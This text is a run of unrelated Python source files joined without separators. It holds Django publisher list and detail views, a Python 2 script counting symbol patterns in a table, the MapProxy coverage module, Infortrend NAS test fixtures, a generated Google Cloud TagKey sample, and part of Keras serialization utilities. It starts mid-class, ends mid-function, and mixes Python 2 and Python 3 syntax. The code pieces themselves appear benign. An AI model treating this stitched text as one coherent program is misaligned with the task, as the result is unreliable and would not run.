        queryset = super(PublishListView, self).get_queryset()
        self.keyword = self.request.GET.get('keyword', '').strip()
        if self.keyword:
            queryset = queryset.filter(Q(name__icontains=self.keyword) |
                                       Q(address__icontains=self.keyword) |
                                       Q(city__icontains=self.keyword))
        return queryset

    def get_context_data(self, **kwargs):
        # Echo the search keyword back so the template can re-render it.
        context = super(PublishListView, self).get_context_data(**kwargs)
        context['keyword'] = self.keyword
        return context

    def post(self, request):
        # Create a new publisher.  On failure, form.errors is returned
        # as-is so the front end can render the messages directly.
        form = PublishForm(request.POST)
        if form.is_valid():
            form.save()
            res = {'code': 0, 'result': '添加出版商成功'}
        else:
            res = {'code': 1, 'errmsg': form.errors}
            # Fixed: stray Python-2 debug statement ``print form.errors``
            # replaced with the module logger.
            logger.error(form.errors)
        return JsonResponse(res, safe=True)


class PublishDetailView(LoginRequiredMixin, DetailView):
    """Publisher detail view.

    Actions: getone (GET), update (POST) and delete (DELETE).
    """
    model = Publish
    template_name = "books/publish_detail.html"
    context_object_name = 'publish'
    next_url = '/books/publishlist/'

    def post(self, request, *args, **kwargs):
        # Update the publisher identified by the URL pk.
        pk = kwargs.get('pk')
        p = self.model.objects.get(pk=pk)
        form = PublishForm(request.POST, instance=p)
        if form.is_valid():
            form.save()
            res = {"code": 0, "result": "更新出版商成功", 'next_url': self.next_url}
        else:
            res = {"code": 1, "errmsg": form.errors, 'next_url': self.next_url}
        return render(request, settings.JUMP_PAGE, res)
        # return HttpResponseRedirect(reverse('books:publish_detail',args=[pk]))

    def delete(self, request, *args, **kwargs):
        # A publisher may only be deleted when no books reference it.
        pk = kwargs.get('pk')
        try:
            obj = self.model.objects.get(pk=pk)
            if not obj.book_set.all():
                self.model.objects.filter(pk=pk).delete()
                res = {"code": 0, "result": "删除出版商成功"}
            else:
                res = {"code": 1, "errmsg": "该出版社有关联书籍,请联系管理员"}
        except Exception:
            # Fixed: was a bare ``except:`` that also swallowed
            # SystemExit/KeyboardInterrupt; log for diagnosis.
            logger.exception("failed to delete publish pk=%s", pk)
            res = {"code": 1, "errmsg": "删除错误请联系管理员"}
        return JsonResponse(res, safe=True)


#!/bin/env python

import itertools
import collections


def read_table(filename):
    """Parse a whitespace-delimited table into ``{column_name: column}``.

    The first line supplies the column names; every following non-blank
    line is a row whose first field (a row label) is discarded.  Columns
    beyond the shortest of header/rows are dropped by ``zip``.
    """
    with open(filename) as handle:
        names = next(handle).split()
        body = [ln.split()[1:] for ln in handle if ln.strip()]
        cols = zip(*body)
    return dict(zip(names, cols))

table = read_table("../../data/colldata.txt")
pots = sorted(table)

alphabet = "+-?"
for num in range(2, len(table) + 1):
    for group in itertools.combinations(pots, num):
        patterns = zip(*[table[p] for p in group])
        counts = collections.Counter(patterns)
        for poss in itertools.product(alphabet, repeat=num):
            print ', '.join(group) + ':',
            print ''.join(poss), counts[poss]

# This file is part of the MapProxy project.
# Copyright (C) 2010 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import with_statement

import operator
import threading

from mapproxy.grid import bbox_intersects, bbox_contains
from mapproxy.util.py import cached_property
from mapproxy.util.geom import (
    require_geom_support,
    load_polygon_lines,
    transform_geometry,
    bbox_polygon,
)
from mapproxy.srs import SRS

import logging
log_config = logging.getLogger('mapproxy.config.coverage')

try:
    import shapely.geometry
    import shapely.prepared
except ImportError:
    # missing Shapely is handled by require_geom_support
    pass

def coverage(geom, srs):
    """Wrap *geom* in the matching coverage type.

    A list/tuple is treated as a bounding box and yields a
    ``BBOXCoverage``; anything else is assumed to be a geometry and
    yields a ``GeomCoverage``.
    """
    if not isinstance(geom, (list, tuple)):
        return GeomCoverage(geom, srs)
    return BBOXCoverage(geom, srs)

def load_limited_to(limited_to):
    """Build a clipping ``GeomCoverage`` from a ``limited_to`` mapping.

    ``limited_to['srs']`` names the spatial reference; ``'geometry'``
    may be a Shapely geometry, a bbox list/tuple, or a newline-separated
    polygon text block.
    """
    require_geom_support()
    srs = SRS(limited_to['srs'])
    geom = limited_to['geometry']

    if not hasattr(geom, 'type'):
        # Not a Shapely geometry: coerce a bbox or polygon text.
        if isinstance(geom, (list, tuple)):
            geom = bbox_polygon(geom)
        else:
            parts = load_polygon_lines(geom.split('\n'))
            geom = parts[0] if len(parts) == 1 else shapely.geometry.MultiPolygon(parts)

    return GeomCoverage(geom, srs, clip=True)

class MultiCoverage(object):
    """Aggregate of multiple coverages.

    A bbox is considered intersecting/contained when any member
    coverage intersects/contains it.

    Fixed: the docstring was previously placed *after* ``clip = False``,
    making it a no-op string statement instead of the class docstring.
    """
    clip = False

    def __init__(self, coverages):
        self.coverages = coverages
        self.bbox = self.extent.bbox

    @cached_property
    def extent(self):
        # Combined extent of all member coverages.
        # NOTE(review): relies on the builtin ``reduce`` (Python 2);
        # Python 3 would need ``functools.reduce``.
        return reduce(operator.add, [c.extent for c in self.coverages])

    def intersects(self, bbox, srs):
        return any(c.intersects(bbox, srs) for c in self.coverages)

    def contains(self, bbox, srs):
        return any(c.contains(bbox, srs) for c in self.coverages)

    def transform_to(self, srs):
        return MultiCoverage([c.transform_to(srs) for c in self.coverages])

    def __eq__(self, other):
        if not isinstance(other, MultiCoverage):
            return NotImplemented

        if self.bbox != other.bbox:
            return False

        if len(self.coverages) != len(other.coverages):
            return False

        # Member-wise comparison, order-sensitive.
        for a, b in zip(self.coverages, other.coverages):
            if a != b:
                return False

        return True

    def __ne__(self, other):
        if not isinstance(other, MultiCoverage):
            return NotImplemented
        return not self.__eq__(other)

    def __repr__(self):
        return '<MultiCoverage %r: %r>' % (self.extent.llbbox, self.coverages)

class BBOXCoverage(object):
    """Coverage defined by an axis-aligned bounding box in a given SRS."""
    clip = False

    def __init__(self, bbox, srs):
        self.bbox = bbox
        self.srs = srs
        self.geom = None

    @property
    def extent(self):
        from mapproxy.layer import MapExtent

        return MapExtent(self.bbox, self.srs)

    def _bbox_in_coverage_srs(self, bbox, srs):
        # Reproject the query bbox into this coverage's SRS if needed.
        if srs == self.srs:
            return bbox
        return srs.transform_bbox_to(self.srs, bbox)

    def intersects(self, bbox, srs):
        return bbox_intersects(self.bbox, self._bbox_in_coverage_srs(bbox, srs))

    def intersection(self, bbox, srs):
        """Return the overlapping BBOXCoverage, or None when disjoint."""
        other = self._bbox_in_coverage_srs(bbox, srs)
        minx = max(self.bbox[0], other[0])
        miny = max(self.bbox[1], other[1])
        maxx = min(self.bbox[2], other[2])
        maxy = min(self.bbox[3], other[3])

        if minx >= maxx or miny >= maxy:
            return None
        return BBOXCoverage((minx, miny, maxx, maxy), self.srs)

    def contains(self, bbox, srs):
        return bbox_contains(self.bbox, self._bbox_in_coverage_srs(bbox, srs))

    def transform_to(self, srs):
        if srs == self.srs:
            return self
        return BBOXCoverage(self.srs.transform_bbox_to(srs, self.bbox), srs)

    def __eq__(self, other):
        if not isinstance(other, BBOXCoverage):
            return NotImplemented
        return self.srs == other.srs and self.bbox == other.bbox

    def __ne__(self, other):
        if not isinstance(other, BBOXCoverage):
            return NotImplemented
        return not self.__eq__(other)

    def __repr__(self):
        return '<BBOXCoverage %r/%r>' % (self.extent.llbbox, self.bbox)


class GeomCoverage(object):
    """Coverage defined by a Shapely geometry in a given SRS."""

    def __init__(self, geom, srs, clip=False):
        self.geom = geom
        self.bbox = geom.bounds
        self.srs = srs
        self.clip = clip
        # Serializes access to the lazily-built prepared geometry.
        self._prep_lock = threading.Lock()
        self._prepared_geom = None
        self._prepared_counter = 0
        self._prepared_max = 10000

    @property
    def extent(self):
        from mapproxy.layer import MapExtent
        return MapExtent(self.bbox, self.srs)

    @property
    def prepared_geom(self):
        # GEOS prepared geometries grow internally over time; rebuild
        # after _prepared_max uses to cap memory consumption.
        stale = not self._prepared_geom or self._prepared_counter > self._prepared_max
        if stale:
            self._prepared_geom = shapely.prepared.prep(self.geom)
            self._prepared_counter = 0
        self._prepared_counter += 1
        return self._prepared_geom

    def _geom_in_coverage_srs(self, geom, srs):
        # Accept a Shapely geometry, an (x, y) point, or a bbox, and
        # return a Shapely geometry expressed in this coverage's SRS.
        if isinstance(geom, shapely.geometry.base.BaseGeometry):
            if srs != self.srs:
                geom = transform_geometry(srs, self.srs, geom)
            return geom
        if len(geom) == 2:
            if srs != self.srs:
                geom = srs.transform_to(self.srs, geom)
            return shapely.geometry.Point(geom)
        if srs != self.srs:
            geom = srs.transform_bbox_to(self.srs, geom)
        return bbox_polygon(geom)

    def transform_to(self, srs):
        if srs == self.srs:
            return self
        return GeomCoverage(transform_geometry(self.srs, srs, self.geom), srs)

    def intersects(self, bbox, srs):
        query = self._geom_in_coverage_srs(bbox, srs)
        with self._prep_lock:
            return self.prepared_geom.intersects(query)

    def intersection(self, bbox, srs):
        query = self._geom_in_coverage_srs(bbox, srs)
        return GeomCoverage(self.geom.intersection(query), self.srs)

    def contains(self, bbox, srs):
        query = self._geom_in_coverage_srs(bbox, srs)
        with self._prep_lock:
            return self.prepared_geom.contains(query)

    def __eq__(self, other):
        if not isinstance(other, GeomCoverage):
            return NotImplemented
        return (self.srs == other.srs
                and self.bbox == other.bbox
                and self.geom.equals(other.geom))

    def __ne__(self, other):
        if not isinstance(other, GeomCoverage):
            return NotImplemented
        return not self.__eq__(other)

    def __repr__(self):
        return '<GeomCoverage %r: %r>' % (self.extent.llbbox, self.geom)
# Copyright (c) 2019 Infortrend Technology, Inc.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.


class InfortrendNASTestData(object):
    """Canned CLI responses and parsed fixtures for Infortrend NAS tests.

    The ``fake_*_data`` strings mimic raw CLI output: a status tuple
    line, a blank line, then a JSON payload.  The remaining attributes
    are the already-parsed structures the driver produces/consumes.
    """

    # Two fake shares: index 0 is the NFS share, index 1 the CIFS share.
    fake_share_id = ['5a0aa06e-1c57-4996-be46-b81e360e8866',  # NFS
                     'aac4fe64-7a9c-472a-b156-9adbb50b4d29']  # CIFS

    # Share names are the IDs with the dashes stripped.
    fake_share_name = [fake_share_id[0].replace('-', ''),
                       fake_share_id[1].replace('-', '')]

    fake_channel_ip = ['172.27.112.223', '172.27.113.209']

    # Raw service-status CLI output (NFS service shown enabled).
    fake_service_status_data = ('(64175, 1234, 272, 0)\n\n'
                                '{"cliCode": '
                                '[{"Return": "0x0000", "CLI": "Successful"}], '
                                '"returnCode": [], '
                                '"data": '
                                '[{"A": '
                                '{"NFS": '
                                '{"displayName": "NFS", '
                                '"state_time": "2017-05-04 14:19:53", '
                                '"enabled": true, '
                                '"cpu_rate": "0.0", '
                                '"mem_rate": "0.0", '
                                '"state": "exited", '
                                '"type": "share"}}}]}\n\n')

    # Raw folder-status CLI output for two pools.
    fake_folder_status_data = ('(64175, 1234, 1017, 0)\n\n'
                               '{"cliCode": '
                               '[{"Return": "0x0000", "CLI": "Successful"}], '
                               '"returnCode": [], '
                               '"data": '
                               '[{"utility": "1.00", '
                               '"used": "33886208", '
                               '"subshare": true, '
                               '"share": false, '
                               '"worm": "", '
                               '"free": "321931374592", '
                               '"fsType": "xfs", '
                               '"owner": "A", '
                               '"readOnly": false, '
                               '"modifyTime": "2017-04-27 16:16", '
                               '"directory": "/share-pool-01/LV-1", '
                               '"volumeId": "6541BAFB2E6C57B6", '
                               '"mounted": true, '
                               '"size": "321965260800"}, '
                               '{"utility": "1.00", '
                               '"used": "33779712", '
                               '"subshare": false, '
                               '"share": false, '
                               '"worm": "", '
                               '"free": "107287973888", '
                               '"fsType": "xfs", '
                               '"owner": "A", '
                               '"readOnly": false, '
                               '"modifyTime": "2017-04-27 15:45", '
                               '"directory": "/share-pool-02/LV-1", '
                               '"volumeId": "147A8FB67DA39914", '
                               '"mounted": true, '
                               '"size": "107321753600"}]}\n\n')

    # Parsed service status with the NFS service disabled.
    fake_nfs_status_off = [{
        'A': {
            'NFS': {
                'displayName': 'NFS',
                'state_time': '2017-05-04 14:19:53',
                'enabled': False,
                'cpu_rate': '0.0',
                'mem_rate': '0.0',
                'state': 'exited',
                'type': 'share',
            }
        }
    }]

    # Parsed folder status matching fake_folder_status_data above.
    fake_folder_status = [{
        'utility': '1.00',
        'used': '33886208',
        'subshare': True,
        'share': False,
        'worm': '',
        'free': '321931374592',
        'fsType': 'xfs',
        'owner': 'A',
        'readOnly': False,
        'modifyTime': '2017-04-27 16:16',
        'directory': '/share-pool-01/LV-1',
        'volumeId': '6541BAFB2E6C57B6',
        'mounted': True,
        'size': '321965260800'}, {
        'utility': '1.00',
        'used': '33779712',
        'subshare': False,
        'share': False,
        'worm': '',
        'free': '107287973888',
        'fsType': 'xfs',
        'owner': 'A',
        'readOnly': False,
        'modifyTime': '2017-04-27 15:45',
        'directory': '/share-pool-02/LV-1',
        'volumeId': '147A8FB67DA39914',
        'mounted': True,
        'size': '107321753600',
    }]

    def fake_get_channel_status(self, ch1_status='UP'):
        """Return parsed channel status; *ch1_status* sets CH1's state."""
        return [{
            'datalink': 'mgmt0',
            'status': 'UP',
            'typeConfig': 'DHCP',
            'IP': '172.27.112.125',
            'MAC': '00:d0:23:00:15:a6',
            'netmask': '255.255.240.0',
            'type': 'dhcp',
            'gateway': '172.27.127.254'}, {
            'datalink': 'CH0',
            'status': 'UP',
            'typeConfig': 'DHCP',
            'IP': self.fake_channel_ip[0],
            'MAC': '00:d0:23:80:15:a6',
            'netmask': '255.255.240.0',
            'type': 'dhcp',
            'gateway': '172.27.127.254'}, {
            'datalink': 'CH1',
            'status': ch1_status,
            'typeConfig': 'DHCP',
            'IP': self.fake_channel_ip[1],
            'MAC': '00:d0:23:40:15:a6',
            'netmask': '255.255.240.0',
            'type': 'dhcp',
            'gateway': '172.27.127.254'}, {
            'datalink': 'CH2',
            'status': 'DOWN',
            'typeConfig': 'DHCP',
            'IP': '',
            'MAC': '00:d0:23:c0:15:a6',
            'netmask': '',
            'type': '',
            'gateway': ''}, {
            'datalink': 'CH3',
            'status': 'DOWN',
            'typeConfig': 'DHCP',
            'IP': '',
            'MAC': '00:d0:23:20:15:a6',
            'netmask': '',
            'type': '',
            'gateway': '',
        }]

    # Parsed quota entries; quota/used are byte counts as strings.
    fake_fquota_status = [{
        'quota': '21474836480',
        'used': '0',
        'name': 'test-folder',
        'type': 'subfolder',
        'id': '537178178'}, {
        'quota': '32212254720',
        'used': '0',
        'name': fake_share_name[0],
        'type': 'subfolder',
        'id': '805306752'}, {
        'quota': '53687091200',
        'used': '21474836480',
        'name': fake_share_name[1],
        'type': 'subfolder',
        'id': '69'}, {
        'quota': '94091997184',
        'used': '0',
        'type': 'subfolder',
        'id': '70',
        "name": 'test-folder-02'
    }]

    # Quota listing when nothing has been configured.
    fake_fquota_status_with_no_settings = []

    def fake_get_share_status_nfs(self, status=False):
        """Return NFS share status; adds nfs_detail when *status* is True."""
        fake_share_status_nfs = [{
            'ftp': False,
            'cifs': False,
            'oss': False,
            'sftp': False,
            'nfs': status,
            'directory': '/LV-1/share-pool-01/' + self.fake_share_name[0],
            'exist': True,
            'afp': False,
            'webdav': False
        }]
        if status:
            fake_share_status_nfs[0]['nfs_detail'] = {
                'hostList': [{
                    'uid': '65534',
                    'insecure': 'insecure',
                    'squash': 'all',
                    'access': 'ro',
                    'host': '*',
                    'gid': '65534',
                    'mode': 'async',
                    'no_subtree_check': 'no_subtree_check',
                }]
            }
        return fake_share_status_nfs

    def fake_get_share_status_cifs(self, status=False):
        """Return CIFS share status; adds cifs_detail when *status* is True."""
        fake_share_status_cifs = [{
            'ftp': False,
            'cifs': status,
            'oss': False,
            'sftp': False,
            'nfs': False,
            'directory': '/share-pool-01/LV-1/' + self.fake_share_name[1],
            'exist': True,
            'afp': False,
            'webdav': False
        }]
        if status:
            fake_share_status_cifs[0]['cifs_detail'] = {
                'available': True,
                'encrypt': False,
                'description': '',
                'sharename': 'cifs-01',
                'failover': '',
                'AIO': True,
                'priv': 'None',
                'recycle_bin': False,
                'ABE': True,
            }
        return fake_share_status_cifs

    # Parsed subfolder listing for pool 01 (includes both fake shares).
    fake_subfolder_data = [{
        'size': '6',
        'index': '34',
        'description': '',
        'encryption': '',
        'isEnd': False,
        'share': False,
        'volumeId': '6541BAFB2E6C57B6',
        'quota': '',
        'modifyTime': '2017-04-06 11:35',
        'owner': 'A',
        'path': '/share-pool-01/LV-1/UserHome',
        'subshare': True,
        'type': 'subfolder',
        'empty': False,
        'name': 'UserHome'}, {
        'size': '6',
        'index': '39',
        'description': '',
        'encryption': '',
        'isEnd': False,
        'share': False,
        'volumeId': '6541BAFB2E6C57B6',
        'quota': '21474836480',
        'modifyTime': '2017-04-27 15:44',
        'owner': 'A',
        'path': '/share-pool-01/LV-1/test-folder',
        'subshare': False,
        'type': 'subfolder',
        'empty': True,
        'name': 'test-folder'}, {
        'size': '6',
        'index': '45',
        'description': '',
        'encryption': '',
        'isEnd': False,
        'share': True,
        'volumeId': '6541BAFB2E6C57B6',
        'quota': '32212254720',
        'modifyTime': '2017-04-27 16:15',
        'owner': 'A',
        'path': '/share-pool-01/LV-1/' + fake_share_name[0],
        'subshare': False,
        'type': 'subfolder',
        'empty': True,
        'name': fake_share_name[0]}, {
        'size': '6',
        'index': '512',
        'description': '',
        'encryption': '',
        'isEnd': True,
        'share': True,
        'volumeId': '6541BAFB2E6C57B6',
        'quota': '53687091200',
        'modifyTime': '2017-04-27 16:16',
        'owner': 'A',
        'path': '/share-pool-01/LV-1/' + fake_share_name[1],
        'subshare': False,
        'type': 'subfolder',
        'empty': True,
        'name': fake_share_name[1]}, {
        'size': '6',
        'index': '777',
        'description': '',
        'encryption': '',
        'isEnd': False,
        'share': False,
        'volumeId': '6541BAFB2E6C57B6',
        'quota': '94091997184',
        'modifyTime': '2017-04-28 15:44',
        'owner': 'A',
        'path': '/share-pool-01/LV-1/test-folder-02',
        'subshare': False,
        'type': 'subfolder',
        'empty': True,
        'name': 'test-folder-02'
    }]

    # Parsed CIFS user listing (two local users).
    fake_cifs_user_list = [{
        'Superuser': 'No',
        'Group': 'users',
        'Description': '',
        'Quota': 'none',
        'PWD Expiry Date': '2291-01-19',
        'Home Directory': '/share-pool-01/LV-1/UserHome/user01',
        'UID': '100001',
        'Type': 'Local',
        'Name': 'user01'}, {
        'Superuser': 'No',
        'Group': 'users',
        'Description': '',
        'Quota': 'none',
        'PWD Expiry Date': '2017-08-07',
        'Home Directory': '/share-pool-01/LV-1/UserHome/user02',
        'UID': '100002',
        'Type': 'Local',
        'Name': 'user02'
    }]

    # NFS share status with three export rules (wildcard ro + two rw hosts).
    fake_share_status_nfs_with_rules = [{
        'ftp': False,
        'cifs': False,
        'oss': False,
        'sftp': False,
        'nfs': True,
        'directory': '/share-pool-01/LV-1/' + fake_share_name[0],
        'exist': True,
        'nfs_detail': {
            'hostList': [{
                'uid': '65534',
                'insecure': 'insecure',
                'squash': 'all',
                'access': 'ro',
                'host': '*',
                'gid': '65534',
                'mode': 'async',
                'no_subtree_check':
                'no_subtree_check'}, {
                'uid': '65534',
                'insecure': 'insecure',
                'squash': 'all',
                'access': 'rw',
                'host': '172.27.1.1',
                'gid': '65534',
                'mode': 'async',
                'no_subtree_check': 'no_subtree_check'}, {
                'uid': '65534',
                'insecure': 'insecure',
                'squash': 'all',
                'access': 'rw',
                'host': '172.27.1.2',
                'gid': '65534',
                'mode': 'async',
                'no_subtree_check': 'no_subtree_check'}]
        },
        'afp': False,
        'webdav': False,
    }]

    # CIFS ACL entries: per-user, group and "other" permissions.
    fake_share_status_cifs_with_rules = [
        {
            'permission': {
                'Read': True,
                'Write': True,
                'Execute': True},
            'type': 'user',
            'id': '100001',
            'name': 'user01'
        }, {
            'permission': {
                'Read': True,
                'Write': False,
                'Execute': True},
            'type': 'user',
            'id': '100002',
            'name': 'user02'
        }, {
            'permission': {
                'Read': True,
                'Write': False,
                'Execute': True},
            'type': 'group@',
            'id': '100',
            'name': 'users'
        }, {
            'permission': {
                'Read': True,
                'Write': False,
                'Execute': True},
            'type': 'other@',
            'id': '',
            'name': ''
        }
    ]

# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetTagKey
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.

# To install the latest published package dependency, execute the following:
#   python3 -m pip install google-cloud-resourcemanager


# [START cloudresourcemanager_v3_generated_TagKeys_GetTagKey_async]
from google.cloud import resourcemanager_v3


async def sample_get_tag_key():
    """Fetch a single TagKey by resource name and print it."""
    # Instantiate the asynchronous TagKeys client.
    client = resourcemanager_v3.TagKeysAsyncClient()

    # Build the request; "name_value" is a placeholder resource name.
    request = resourcemanager_v3.GetTagKeyRequest(
        name="name_value",
    )

    # Issue the RPC and wait for the result.
    response = await client.get_tag_key(request=request)

    # Display the retrieved TagKey.
    print(response)

# [END cloudresourcemanager_v3_generated_TagKeys_GetTagKey_async]

# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python utilities required by Keras."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import binascii
import codecs
import marshal
import os
import re
import sys
import time
import types as python_types

import numpy as np
import six

from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import keras_export

# Module-level registry mapping custom-object names to objects; mutated by
# CustomObjectScope and handed out directly by get_custom_objects().
_GLOBAL_CUSTOM_OBJECTS = {}


@keras_export('keras.utils.CustomObjectScope')
class CustomObjectScope(object):
  """Provides a scope that changes to `_GLOBAL_CUSTOM_OBJECTS` cannot escape.

  While the `with` block is active, the dictionaries handed to the
  constructor are merged into the global custom-object registry so that
  lookups by name succeed. On exit the registry is restored to the exact
  state it had when the block was entered.

  Example:

  Consider a custom object `MyObject` (e.g. a class):

  ```python
      with CustomObjectScope({'MyObject':MyObject}):
          layer = Dense(..., kernel_regularizer='MyObject')
          # save, load, etc. will recognize custom object by name
  ```
  """

  def __init__(self, *args):
    # Each positional argument is a dict of name -> custom object.
    self.custom_objects = args
    self.backup = None

  def __enter__(self):
    # Snapshot the registry so __exit__ can restore it verbatim.
    self.backup = _GLOBAL_CUSTOM_OBJECTS.copy()
    for mapping in self.custom_objects:
      _GLOBAL_CUSTOM_OBJECTS.update(mapping)
    return self

  def __exit__(self, *args, **kwargs):
    # Revert the registry to the snapshot taken on entry.
    _GLOBAL_CUSTOM_OBJECTS.clear()
    _GLOBAL_CUSTOM_OBJECTS.update(self.backup)


@keras_export('keras.utils.custom_object_scope')
def custom_object_scope(*args):
  """Provides a scope that changes to `_GLOBAL_CUSTOM_OBJECTS` cannot escape.

  Thin functional alias for `CustomObjectScope`: inside the returned
  context manager, the custom objects given here resolve by name, and the
  global registry is restored once the `with` block ends.

  Example:

  Consider a custom object `MyObject`

  ```python
      with custom_object_scope({'MyObject':MyObject}):
          layer = Dense(..., kernel_regularizer='MyObject')
          # save, load, etc. will recognize custom object by name
  ```

  Arguments:
      *args: Variable length list of dictionaries of name,
          class pairs to add to custom objects.

  Returns:
      Object of type `CustomObjectScope`.
  """
  return CustomObjectScope(*args)


@keras_export('keras.utils.get_custom_objects')
def get_custom_objects():
  """Retrieves a live reference to the global dictionary of custom objects.

  Prefer `custom_object_scope` for scoped updates; this accessor hands
  back the mutable registry itself, so edits made here are global.

  Example:

  ```python
      get_custom_objects().clear()
      get_custom_objects()['MyObject'] = MyObject
  ```

  Returns:
      Global dictionary of names to classes (`_GLOBAL_CUSTOM_OBJECTS`).
  """
  return _GLOBAL_CUSTOM_OBJECTS


def serialize_keras_class_and_config(cls_name, cls_config):
  """Returns the serialization of the class with the given config."""
  serialized = {'class_name': cls_name}
  serialized['config'] = cls_config
  return serialized


@keras_export('keras.utils.serialize_keras_object')
def serialize_keras_object(instance):
  """Serializes a Keras object to its config dict, its name, or None."""
  _, instance = tf_decorator.unwrap(instance)
  if instance is None:
    return None
  # Objects exposing get_config() serialize to {'class_name', 'config'}.
  if hasattr(instance, 'get_config'):
    return serialize_keras_class_and_config(type(instance).__name__,
                                            instance.get_config())
  # Plain functions and classes serialize to their bare name.
  if hasattr(instance, '__name__'):
    return instance.__name__
  raise ValueError('Cannot serialize', instance)


def class_and_config_for_serialized_keras_object(
    config,
    module_objects=None,
    custom_objects=None,
    printable_module_name='object'):
  """Returns the class name and config for a serialized keras object."""
  # A valid serialized object is a dict carrying both mandatory keys.
  if not isinstance(config, dict):
    raise ValueError('Improper config format: ' + str(config))
  if 'class_name' not in config or 'config' not in config:
    raise ValueError('Improper config format: ' + str(config))

  class_name = config['class_name']
  # Resolution order: caller-supplied custom objects, then the global
  # custom-object registry, then the module's own objects.
  if custom_objects and class_name in custom_objects:
    cls = custom_objects[class_name]
  elif class_name in _GLOBAL_CUSTOM_OBJECTS:
    cls = _GLOBAL_CUSTOM_OBJECTS[class_name]
  else:
    cls = (module_objects or {}).get(class_name)
    if cls is None:
      raise ValueError('Unknown ' + printable_module_name + ': ' + class_name)
  return (cls, config['config'])


@keras_export('keras.utils.deserialize_keras_object')
def deserialize_keras_object(identifier,
                             module_objects=None,
                             custom_objects=None,
                             printable_module_name='object'):
  """Turns a serialized Keras object back into the actual object.

  Arguments:
      identifier: None, a config dict (`{'class_name', 'config'}`), or a
          string naming the object.
      module_objects: dict of builtin name -> object used as the final
          lookup table.
      custom_objects: dict of user-supplied name -> object, consulted
          before `module_objects`.
      printable_module_name: label used in error messages.

  Returns:
      The deserialized object, or None if `identifier` is None.

  Raises:
      ValueError: if the identifier cannot be interpreted or names an
          unknown object.
  """
  if identifier is None:
    return None
  if isinstance(identifier, dict):
    # In this case we are dealing with a Keras config dictionary.
    config = identifier
    (cls, cls_config) = class_and_config_for_serialized_keras_object(
        config, module_objects, custom_objects, printable_module_name)

    if hasattr(cls, 'from_config'):
      arg_spec = tf_inspect.getfullargspec(cls.from_config)
      custom_objects = custom_objects or {}

      if 'custom_objects' in arg_spec.args:
        return cls.from_config(
            cls_config,
            custom_objects=dict(
                list(_GLOBAL_CUSTOM_OBJECTS.items()) +
                list(custom_objects.items())))
      with CustomObjectScope(custom_objects):
        return cls.from_config(cls_config)
    else:
      # Then `cls` may be a function returning a class.
      # in this case by convention `config` holds
      # the kwargs of the function.
      custom_objects = custom_objects or {}
      with CustomObjectScope(custom_objects):
        return cls(**cls_config)
  elif isinstance(identifier, six.string_types):
    object_name = identifier
    if custom_objects and object_name in custom_objects:
      obj = custom_objects.get(object_name)
    elif object_name in _GLOBAL_CUSTOM_OBJECTS:
      obj = _GLOBAL_CUSTOM_OBJECTS[object_name]
    else:
      obj = module_objects.get(object_name)
      if obj is None:
        raise ValueError('Unknown ' + printable_module_name + ':' + object_name)
    # Classes passed by name are instantiated with no args, functions are
    # returned as-is.
    if tf_inspect.isclass(obj):
      return obj()
    return obj
  else:
    # BUG FIX: `identifier` is neither a dict nor a string in this branch,
    # so concatenating it with '+' raised TypeError instead of the intended
    # ValueError. Use %-formatting so any type is reported correctly.
    raise ValueError('Could not interpret serialized %s: %s' %
                     (printable_module_name, identifier))


def func_dump(func):
  """Serializes a user defined function.

  Arguments:
      func: the function to serialize.

  Returns:
      A tuple `(code, defaults, closure)` where `code` is the
      base64-encoded marshalled bytecode.
  """
  raw_code = marshal.dumps(func.__code__)
  if os.name == 'nt':
    # On Windows, normalize backslashes embedded in the marshalled
    # bytecode before encoding.
    raw_code = raw_code.replace(b'\\', b'/')
  code = codecs.encode(raw_code, 'base64').decode('ascii')
  defaults = func.__defaults__
  closure = None
  if func.__closure__:
    closure = tuple(cell.cell_contents for cell in func.__closure__)
  return code, defaults, closure


def func_load(code, defaults=None, closure=None, globs=None):
  """Deserializes a user defined function.

  Arguments:
      code: bytecode of the function.
      defaults: defaults of the function.
      closure: closure of the function.
      globs: dictionary of global objects.

  Returns:
      A function object.
  """
  if isinstance(code, (tuple, list)):  # unpack previous dump
    code, defaults, closure = code
    if isinstance(defaults, list):
      defaults = tuple(defaults)

  def _as_cell(value):
    """Wraps `value` in a cell object unless it already is one."""
    def probe():
      # pylint: disable=pointless-statement
      value  # accessed so the enclosing scope captures it in __closure__

    captured = probe.__closure__[0]
    # If `value` already is a cell, pass it through untouched.
    return value if isinstance(value, type(captured)) else captured

  if closure is not None:
    closure = tuple(_as_cell(item) for item in closure)
  try:
